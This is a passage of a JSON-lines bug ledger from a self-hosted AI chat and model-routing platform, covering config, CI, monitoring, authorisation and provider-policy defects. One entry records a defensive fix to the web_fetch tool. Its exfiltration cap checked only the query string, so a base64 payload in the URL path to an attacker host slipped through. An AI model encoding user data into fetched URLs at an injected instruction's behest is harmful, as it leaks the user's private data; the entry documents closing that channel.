every DEFAULT_CONFIG key to its own database on first boot (Config.seed_defaults), and the database outranks the environment forever after that. hive_rag_env_config.py's RAG_CONFIG_ENV/FEATURE_CONFIG_ENV reconcile maps only listed the keys prior issues had already hit; web.loader.timeout and thirteen other DEFAULT_CONFIG-backed compose variables (webui.url, ui.default_locale, ui.default_user_role, ui.enable_signup, rag.top_k, web.search.result_count, web.search.searxng_query_url, openai.enable, ollama.enable, openai.api_base_urls+openai.api_keys, ui.enable_community_sharing, evaluation.arena.enable) were never added, so compose changes to any of them were no-ops on an already-booted deployment, invisible from the workflow file, from docker compose config, and from the container's own environment, only visible by reading the effective config store on the box.", "fix": "Added the thirteen missing entries to RAG_CONFIG_ENV/FEATURE_CONFIG_ENV (including a new INT_KEYS coercion for the two integer-valued keys and a new openai_connection_override for the paired list-valued openai connection). Classified the oauth.* cluster as intentionally environment-only (utils/oauth.py reads those as frozen module constants, never via Config.get, so they are safe). Added guard_unreconciled_env_vars, called before reconcile() at every boot, which re-derives the persisted-key-to-env-var mapping from the running process's own open_webui.config source via inspect.getsource and raises RuntimeError if the deploy environment sets a variable neither reconciled nor allowlisted, so the next instance of this bug class fails the container boot loudly instead of being found by reading a config table on a live box.", "tags": ["chat", "owui-patches", "config", "security", "issue-1575", "issue-722"]} +{"id": "bug-2026-08-30-litellm-keyless-provider-dangling-env-ref", "date": "2026-08-30", "severity": "medium", "area": "control-plane/litellmconfig", "error_message": "A custom_providers row with an empty api_key_env generates litellm_params.api_key = \"os.environ/\" with no variable name after it. LiteLLM resolves that to nothing, the OpenAI client is constructed with no api_key, and the deployment fails at request time with an error naming no route.", "root_cause": "litellmconfig.Generate concatenated \"os.environ/\" with custom_providers.api_key_env unconditionally. Every provider seeded until now named a real environment variable, so the case where the column is empty had no representation and was never exercised. The schema could hold a keyless provider; the generated config could not express one.", "fix": "Generate now reads an empty api_key_env as a keyless provider and emits the literal placeholder litellmconfig.NoCredentialPlaceholder instead of a dangling environment reference. Suppressing the Authorization header entirely is not expressible in a LiteLLM api_key and is done per deployment with an extra_headers override in deploy/litellm/config.yaml, which the field-by-field merge preserves. Guarded by TestGenerateKeylessProviderEmitsNoDanglingEnvironmentReference and TestGenerateKeyedProviderStillUsesEnvironmentReference.", "tags": ["litellm", "config-sync", "provider-catalog", "keyless", "opencode-zen"]} +{"date": "2026-08-23", "title": "Cloudflare answered 403 Error 1010 to the default Python urllib user agent, so every HTTP check against the demo hostnames failed", "error_message": "HTTP 403 {\"title\":\"Error 1010: Access denied\",\"detail\":\"The site owner has blocked access based on your browser's signature\"}", "root_cause": "urllib sends User-Agent: Python-urllib/3.x by default, and the Cloudflare bot rules in front of chat-hive.scubed.co and console-hive.scubed.co block that signature. curl from the same host in the same second returned 200, which is why the failure read as a dead backend rather than a blocked client.", "fix": "scripts/post-deploy-verify.py and scripts/preflight-supabase-config.py set an explicit named User-Agent on every request.", "tags": ["cloudflare", "http", "verification", "false-negative", "demo-box"]} +{"date": "2026-08-23", "title": "The Supabase preflight reported a wrong host as a healthy project because it only checked the status code", "error_message": "PREFLIGHT PASSED against SUPABASE_URL=https://chat-hive.scubed.co", "root_cause": "The liveness check asserted GET /auth/v1/health returned 200 and nothing about the body, while chat-hive.scubed.co is a single-page app that answers 200 with HTML for every unknown path.", "fix": "The preflight requires the health body to be GoTrue's own document and fails naming what answered instead.", "tags": ["supabase", "preflight", "false-positive", "issue-1059"]} +{"date": "2026-08-23", "title": "post-deploy-verify filed an issue claiming the demo box was broken from a pull request run", "error_message": "issue #1062 post-deploy-verify is failing against the demo box, verify=failure, trigger=pull_request", "root_cause": "The report-failure job was gated on failure() alone, so a label-gated pull request run of the workflow, including every negative-control run that is expected to fail, filed an outage issue for the deployment.", "fix": "The notifier requires github.event_name == 'workflow_run', and a missing verification identity files under its own title.", "tags": ["github-actions", "notifier", "false-alarm", "issue-1062"]} +{"date": "2026-08-23", "title": "The verification could not sign in at all because the box's SUPABASE_URL is an in-network compose hostname", "error_message": "SUPABASE_URL=http://caddy-supabase does not resolve from the runner host", "root_cause": "Services inside the compose network reach auth at http://caddy-supabase; this job runs on the host outside that network. The public auth origin is NEXT_PUBLIC_SUPABASE_URL, a different value on this box.", "fix": "The workflow reads NEXT_PUBLIC_SUPABASE_URL first, pairs it with NEXT_PUBLIC_SUPABASE_ANON_KEY, and fails immediately when the resolved host has no dot in it.", "tags": ["supabase", "demo-box", "networking", "verification"]} +{"date": "2026-08-23", "title": "The verifier crashed with AttributeError instead of a named failure when a 200 carried the wrong JSON shape", "error_message": "AttributeError on payload.get / viewer.get / entries iteration", "root_cause": "Decoded JSON was field-accessed without type validation, and main() catches CheckFailed only, so a malformed 200 skipped the per-check summary entirely.", "fix": "Sign-in, viewer and ledger payloads are shape-checked before access and raise the named CheckFailed.", "tags": ["python", "verification", "error-handling"]} +{"date": "2026-09-01", "title": "A test's bounded spin let the caller take the permit it was meant to be refused, deadlocking the package for ten minutes", "error_message": "go test ./apps/edge-api/internal/webtools/ -run TestReduceEmbedDeadlineIsNotReportedAsAPageTimeout hangs; goroutine 21 blocked in stubEmbedder.EmbedBatch on <-s.hold while holding the only semaphore permit, goroutine 22 blocked in Reducer.score waiting for it", "root_cause": "The test spun a bounded loop waiting for a background goroutine to take the single semaphore permit, then fell through whether or not the condition was ever met. A bounded spin is not a synchronisation primitive: on a single-P scheduler the background goroutine may not have run at all, so the main goroutine took the free permit itself and blocked on the hold channel, and the close that would release it sits after the blocked call. Both goroutines then waited on each other until the ten minute Go package timeout. It presents as slow CI rather than as a failing assertion, which is the shape that gets misread as infrastructure.", "fix": "Replace the spin with a signal: stubEmbedder gains an entered channel closed by the first EmbedBatch call under the mutex, and the test blocks on it. Verified with 40 iterations and the whole package five times at GOMAXPROCS=1, where the unpatched version deadlocks on the first iteration.", "tags": ["tests", "concurrency", "deadlock", "flaky", "webtools", "issue-1581"], "files": ["apps/edge-api/internal/webtools/reduce_test.go"]} +{"date": "2026-09-01", "title": "The web_fetch exfiltration cap covered the query string only, leaving the path as an equally usable carrier", "error_message": "https://attacker.example/<1900 bytes of base64> has an empty RawQuery, so it passed both the 512 byte carrier check and the 2048 byte whole-URL check", "root_cause": "MaxFetchQueryChars was checked against admitted.RawQuery alone. The path carries a payload just as well and was bounded only by MaxURLChars, so the stated reduction of the channel from about 6 KB per turn to 1.5 KB was true of the query string and false of the URL. A stated bound that is not the bound is the third instance of that class in this slice.", "fix": "Check len(admitted.Path)+len(admitted.RawQuery) against the same cap, so the two carriers share one budget and splitting a payload across them buys nothing. Correct the figure in the pull request body. Tests cover the path-only carrier and the split payload.", "tags": ["webtools", "web_fetch", "prompt-injection", "exfiltration", "issue-1640", "issue-1581"], "files": ["apps/edge-api/internal/webtools/handler.go", "apps/edge-api/internal/webtools/fetch_test.go"]} +{"date": "2026-08-11", "title": "A coverage guard that executed workflow text and counted nightly-only runs as gating", "error_message": "spec wiring guard reported 18/34 wired while zero of the eighteen gated a pull request", "root_cause": "verify-spec-wiring.mjs parsed Playwright invocations out of workflow run: lines and executed them, including a --config path Playwright then imported, which is arbitrary code execution inside a required check. It also counted every workflow equally regardless of trigger, took its numerator and denominator from different sets, and dropped npm script arguments, so the printed number could be improved without any additional test running.", "fix": "Moved the guard to tools/verify-spec-wiring.mjs, made it execute nothing by resolving wiring through playwright-spec-manifest.json (which gains a configs section verified by the collection guard against a live --list), split the report into pull-request gated, other-trigger and dark with a ledger that declares which, took both sides of the ratio from the manifest, expanded npm scripts into their real argv, and made an unmodelled narrowing flag a hard failure.", "tags": ["ci", "testing", "coverage-metric", "required-check", "code-execution", "issue-813", "issue-822"]} +{"date": "2026-08-16", "title": "Required check died on ERR_MODULE_NOT_FOUND: no job installed root dev deps", "error_message": "Cannot find package yaml imported from tools/verify-spec-wiring.mjs", "root_cause": "web-unit sets working-directory to apps/web-console and its only npm ci runs there. Two guard steps override working-directory to the repo root and import the root devDependency yaml, but nothing installed root node_modules in that job. The declaration existed, the install did not. Sibling root-scoped steps hid the gap because they import nothing.", "fix": "Re-included the root package-lock.json in .gitignore per the rule its own comment states, committed the 15-package lockfile, added a root-scoped install step to web-unit ahead of both guard steps, and replaced the npm ci fallback chain in repo-policy-lints with plain npm ci, since falling back to npm install turned lockfile drift into a silent floating install.", "tags": ["ci", "required-check", "npm", "lockfile", "fail-open", "issue-813", "issue-822"]} +{"id": "bug-2026-08-11-coverage-gate-forced-proof", "date": "2026-08-11", "area": "testing", "error_message": "chat interaction coverage reported controls as proven that were never shown to work: destructive controls were clicked with their write aborted and then forced proven:true, background REST polling inside a control's settle window counted as that control's network proof, and COV_FLOORS=update rewrote the surface floors from the same run that was supposed to check them", "root_cause": "three separate ways for the gate to manufacture a green: an aborted request has no server verdict but was treated as one, only socket.io was excluded from the request evidence channel while Open WebUI also polls REST, and setting a threshold and checking it happened in one pass so a degraded run ratified itself as the new baseline (Interface 56 to 48, General 17 to 16, Audio 8 to 7)", "fix": "destructive controls are asserted present, enabled and named and never fired, in a not-fired category that is neither proof nor failure; each surface is sampled while idle and its own background request signatures are excluded from proof; floors are read-only during a sweep and changed by scripts/update-chat-coverage-floors.mjs against a recorded ledger, which refuses to lower one without --allow-lower, with a unit test holding the committed floors at or above a recorded live run", "tags": ["e2e", "playwright", "coverage", "false-green", "chat"]} +{"id": "bug-2026-08-29-chat-delete-preauth-task-cancel", "date": "2026-08-29", "title": "DELETE /api/v1/chats/{id} cancelled another user's in-flight tasks before it checked ownership", "error_message": "vendor/open-webui/backend/open_webui/routers/chats.py delete_chat_by_id: `await stop_item_tasks(request.app.state.redis, id)` as the handler's first statement, above the role split and above every ownership check", "root_cause": "stop_item_tasks takes an item id and a Redis handle and cancels every task registered against that id, performing no ownership check of its own. Upstream placed the call at the top of the delete handler so cancellation could not be skipped by an early return, which put it above the role split, above the chat.delete permission gate and above the user-scoped lookup. A verified user holding another user's chat id therefore cancelled that user's streaming completion, title generation and tag generation by issuing a DELETE that was then refused with a 404. The refusal was real and the chat row survived, so every check that looked at the response or at the row read as a correct denial; the defect was visible only in the side effect that had already fired. PR #1462's structural guard pinned the ordering of the permission gate, the scoped lookup, the 404 and the delete, and recorded this call as out of its scope rather than covering it.", "fix": "Added deploy/docker/owui-patches/apply_chat_delete_task_cancel_1474_patch.py, an exact-literal build-time rewrite (a vendored edit would be inert, since Dockerfile.open-webui builds only the frontend from vendor/open-webui and ships the Python backend from the pinned upstream image). It removes the pre-authorisation call and inserts it into both arms of the role split, in each case immediately after that arm's 404, so the cancellation still precedes the delete and an owner's own tasks are cancelled as before on the success path. Both arms are patched even though ENABLE_ADMIN_CHAT_ACCESS is false on this deployment and only the non-admin arm executes. Verified by scripts/test_owui_chat_delete_task_cancel.py, which extracts the real patched handler, executes it against recording stubs and counts cancellations and their ordering, running the same driver against the patch chain with and without the new patch so the pre-fix behaviour is observed rather than described. Review then found that two separate lists could not show the interleaving and that a cancel-below-delete mutant passed everything; a single ordered event log fixed that, and the same property was added to the patch script as a per-arm build-time assertion. Review also found the vendored tree was never asserted to match the pinned backend image, so both scripts now compare the versions and go red on drift. Two siblings of the same primitive were found by review, verified in source and filed rather than folded in: socket/main.py ydoc:document:update cancels for any non-note: document id with no ownership check (#1508), and main.py's task endpoints carry a bare admin bypass that ENABLE_ADMIN_CHAT_ACCESS does not gate (#1511).", "tags": ["authorization", "open-webui", "owui-patches", "chat", "side-effects", "issue-1474", "issue-1462", "issue-1508", "issue-1511"]} +{"id": "selfhost-supabase-two-project-seam", "date": "2026-08-20", "error_message": "getent hosts caddy-supabase returns nothing from inside hive-control-plane-1, and the self-hosted Supabase gateway publishes no ports", "root_cause": "the self-hosted Supabase data plane was brought up with docker compose -p hivesupabase from a second checkout at /home/sakib/selfhost-stage1, so it landed on its own default network hivesupabase_default while every application service stayed on hive_default. docker-compose.enterprise.yml declares name: hive precisely so that layering it onto docker-compose.yml puts both halves in one project and one network, and overriding the project name discarded that. Two projects also split the named volumes, so the exported certificate authority edge-api mounts and the restored Postgres data directory were both unreachable from the application project", "fix": "bring the data plane up as part of project hive by layering -f docker-compose.yml -f docker-compose.enterprise.yml from the canonical checkout, add a selfhost profile covering exactly the Supabase data-plane services so it can run under the local and chat application profiles, and guard the silent properties (one project name, no named network, profile coverage, https JWKS plus its CA mount, issuer agreement, libpq DSN flavour) in scripts/test_selfhost_supabase_seam.py", "tags": ["compose", "networking", "supabase", "self-hosted", "demo-box", "seam"]} +{"date": "2026-08-20", "title": "CI jobs shared one Supabase project with live traffic", "error_message": "FATAL: (EMAXCONNSESSION) max clients reached in session mode", "root_cause": "Seven CI jobs pointed at the hosted Supabase project that also serves the live demo stack. Its Supavisor session-mode pool is capped at 15 clients, so concurrent CI stacks exhausted it and failed unrelated jobs with timeouts that read as front end bugs rather than as contention.", "fix": "live-integration and web-e2e boot their own pgvector Postgres and apply supabase/migrations through scripts/apply-migrations.sh; web-e2e additionally stands up GoTrue and PostgREST behind one nginx origin, because its fixture seeder speaks supabase-js and GoTrue's custom access token hook runs inside the same database as the user rows. pr-cleanup.yml is deleted, its branch deletion replaced by the repository's delete_branch_on_merge setting.", "tags": ["ci", "postgres", "supabase", "gotrue", "shared-state"]} +{"date": "2026-08-30", "title": "CI called paid completion models on seventeen surfaces", "error_message": "HIVE_TOOLS_MODEL resolved to deepseek-v4-flash and HIVE_TEST_MODEL/HIVE_AGENT_ENGINE_LLM_MODEL/HIVE_VERIFY_MODEL resolved to hive-default across workflows, compose and the SDK suites, so every CI run and every agent proof run spent paid provider credit against the owner's free-aliases-only rule", "root_cause": "Each model value was chosen locally, in the file that needed it, against whatever alias satisfied that one spec's capability requirement. The free-pool move (D-047) repointed HIVE_TEST_MODEL but left every capability-specific value behind, and nothing in the repository could answer 'which model values does CI call, and are any of them paid' without a human grepping alias names. A name grep also could not have found the four paid compose defaults, since the paid alias only appears there as a shell default inside a ${VAR:-default} expansion.", "fix": "Repointed fifteen values at upstream-free aliases (hive-small for anything needing tools or structured output, verified live at cost 0 for tool_calls, tool_choice required/none/auto, multi-turn tool results and both response_format modes; hive-free for plain chat) and flagged two for the owner (HIVE_IMAGE_MODEL, since hive-auto is the only alias declaring supports_image_generation; and the demo box's deployed agent model, which is a product decision not a CI call). Added TestNoCISurfaceCallsAPaidCompletionModel, which resolves every model binding on a CI surface through the seeded alias catalog rather than a denylist of names, exempts embeddings on the alias's own capability rows, and runs in the required go-tests lane. Proven red on both a reintroduced paid value and on a paid alias seeded after the guard was written.", "tags": ["ci", "billing", "catalog", "routing", "guard", "free-pool", "D-047", "D-048"]} +{"date": "2026-08-22", "title": "Nightly metering retention was never scheduled on the self-hosted box while the deploy reported it as active", "error_message": "::notice::Nightly metering retention is scheduled and active ('metering-shadow-verdicts-purge', 0 21 * * *) printed by scripts/check-retention-schedule.sh on a database where SHOW shared_preload_libraries was empty, pg_available_extensions had no pg_cron row, and the cron schema did not exist", "root_cause": "Two defects compounding. The self-hosted data plane ran pgvector/pgvector:pg16, which ships no pg_cron, so 20260729_02's pg_available_extensions guard took its skip branch and cron.schedule never ran. Separately the deploy's retention check connected through a secret set that still named the hosted Supabase project, where pg_cron is preloaded, so it reported a true fact about a database the application does not use, and it reported absence as a ::warning:: with exit 0 in any case.", "fix": "Build the database image from the same digest-pinned pgvector base plus postgresql-16-cron (deploy/docker/Dockerfile.supabase-db) and start supabase-db with shared_preload_libraries=pg_cron, so the extension survives a container recreate and a fresh volume. Add supabase/migrations/20260822_01 to create the extension and schedule the job, raising rather than noticing when pg_cron is available and the job still does not appear. Make scripts/check-retention-schedule.sh a gate that requires the cluster identifier read from the running supabase-db container, compares it against its own connection, and exits non-zero for a missing, inactive, hollow, wrong-database, failed or non-executing job, with the verdict read from cron.job_run_details rather than from cron.job alone.", "tags": ["pg_cron", "retention", "false-green", "self-hosted-supabase", "deploy-demo-box", "silent-failure", "issue-615", "issue-645"]} +{"id": "BUG-2026-08-22-alerting-chain-decorative", "date": "2026-08-22", "title": "Every alert went nowhere for four months: dead receiver, rules that never loaded, and a gauge that cleared itself when work was lost", "error_message": "Alertmanager route receiver 'default' with webhook_configs url http://localhost:9095/webhook where nothing listens; curl localhost:9090/api/v1/rules missing SignupProvisioningSweepFailing after its deploy; hive_signup_provisioning_sweep_failures resets to 0 when the faulting identity ages out of the lookback window", "root_cause": "Three independent defects on one chain. (1) The only Alertmanager receiver was a webhook to a port nothing has ever listened on, added in 0c130db6a on 2026-04-24, and no check asserted a delivery target. (2) prometheus.yml and alerts.yml are single-file bind mounts: git pull replaces the file and allocates a new inode, so the running container keeps showing the old copy forever, and docker compose up -d finds no reason to recreate a container when only a mounted file's contents changed, and Prometheus was never sent a reload either. Measured live: host alerts.yml inode 134312 against guest 132251. (3) recordSweep(report.Failed == 0) resets the consecutive-failure gauge, and a sweep goes clean the moment the identity that kept faulting is older than the 24 hour lookback window, so the alert resolved precisely when the loss became permanent.", "fix": "Receiver is now email from no_reply@hive.scubed.co to ENTERPRISE_SMTP_ADMIN_EMAIL with the relay read from the existing ENTERPRISE_SMTP_* variables, and the config moves into docker-compose.yml as a compose configs block so Compose can interpolate it and so up -d recreates on change; unconfigured falls back to the RFC 2606 reserved smtp-not-configured.invalid so the config parses, alerts stay visible, and every send fails loudly. A deploy step applies the Prometheus bind mounts the way the Caddy step already does (recreate when the mounted copy diverges by content, SIGHUP when it matches) and a following step asserts scrape jobs, rule-file paths, every repository alert name, and the Alertmanager receiver from the live APIs. Added hive_signup_provisioning_faults_total (monotonic counter) and hive_signup_provisioning_stranded_identities (gauge over a seven day trailing window), keeping the consecutive gauge as the currently-failing signal. Prometheus now scrapes Alertmanager and itself so notification failures and rejected reloads are measurable at all. Verified against the real relay from the box: AUTH 235, sender accepted at MAIL FROM 250, blocked only by a Brevo 502 account-activation refusal that Alertmanager reports verbatim.", "tags": ["monitoring", "prometheus", "alertmanager", "docker-compose", "bind-mount", "inode", "metrics", "signup", "observability", "silent-failure", "smtp", "pr-993", "pr-89"]} +{"id": "bug-2026-08-23-openrouter-provider-name-vs-displayname-join", "date": "2026-08-23", "title": "Joining OpenRouter endpoint provider_name against all-providers displayName silently reports a training provider as zero-retention", "error_message": "A capability-and-data-policy scan of OpenRouter's free models reported every NVIDIA free endpoint as training:false, retainsPrompts:false, when NVIDIA's published policy is training:true, retainsPrompts:true", "root_cause": "GET /api/v1/models/{slug}/endpoints reports the provider in its `name` form (`Nvidia`) while GET /api/frontend/v1/all-providers keys the record by `displayName` (`NVIDIA`). 18 of 82 providers have name != displayName. A dictionary keyed on displayName therefore misses the lookup entirely, and a default of an empty policy object reads as no-training and zero-retention rather than as unknown, so the failure presents as the safest possible answer instead of an error. The scan looked authoritative and was inverted on exactly the axis a data-sovereignty product cares about.", "fix": "Key the provider lookup on both `name` and `displayName`, and treat a missing policy as UNKNOWN rather than as permissive. Re-ran the scan: only two of five full-capability free models are served by non-training providers, not four. Also verified the conclusion independently against live behaviour: with provider.data_collection deny set, five of five requests routed away from every NVIDIA endpoint, which agrees with the corrected join and contradicts the original one.", "tags": ["openrouter", "data-policy", "sovereignty", "false-green", "join-key-mismatch", "provider-catalog"]}